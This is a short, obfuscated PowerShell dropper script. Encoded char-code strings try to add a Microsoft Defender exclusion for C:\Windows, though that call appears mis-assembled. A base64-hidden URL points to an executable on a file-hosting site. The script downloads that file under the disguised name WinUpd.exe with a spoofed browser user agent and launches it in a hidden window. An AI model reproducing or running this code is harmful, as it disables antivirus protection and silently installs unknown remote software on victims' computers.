[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;

# Obfuscated path exclusion
${_1} = [char]65 + [char]100 + [char]100 + [char]45 + [char]77 + [char]112 + [char]80 + [char]114 + [char]101 + [char]102 + [char]101 + [char]114 + [char]101 + [char]110 + [char]99 + [char]101;
${_2} = [char]45 + [char]69 + [char]120 + [char]99 + [char]108 + [char]117 + [char]115 + [char]105 + [char]111 + [char]110 + [char]80 + [char]97 + [char]116 + [char]104;
${_3} = [char]67 + [char]58 + [char]92 + [char]87 + [char]105 + [char]110 + [char]100 + [char]111 + [char]119 + [char]115;
.("{1}{0}"-f ${_1},${_2}) ${_3};

# Obfuscated download and execution
${_4} = [System.Convert]::FromBase64String("aHR0cHM6Ly93d3cudXBsb2FkLmVlL2Rvd25sb2FkLzE4MTg1MDQ0LzQ0MzQ5OWM1YTZjNzIwY2FiNjIyL3ZtLmV4ZQ==");
${_5} = [System.Text.Encoding]::UTF8.GetString(${_4});
${_6} = "$env:Public\" + [char]76 + [char]111 + [char]103 + [char]115 + [char]92 + [char]87 + [char]105 + [char]110 + [char]85 + [char]112 + [char]100 + [char]46 + [char]101 + [char]120 + [char]101;

$var1 = New-Object Net.WebClient;
$var1.Headers.Add([char]85 + [char]115 + [char]101 + [char]114 + [char]45 + [char]65 + [char]103 + [char]101 + [char]110 + [char]116, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36");
$var1.DownloadFile(${_5}, ${_6});

$var2 = New-Object System.Diagnostics.ProcessStartInfo;
$var2.FileName = ${_6};
$var2.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden;
$var2.CreateNoWindow = $true;
[System.Diagnostics.Process]::Start($var2) | Out-Null;

# Cleanup
[System.GC]::Collect();
[System.GC]::WaitForPendingFinalizers();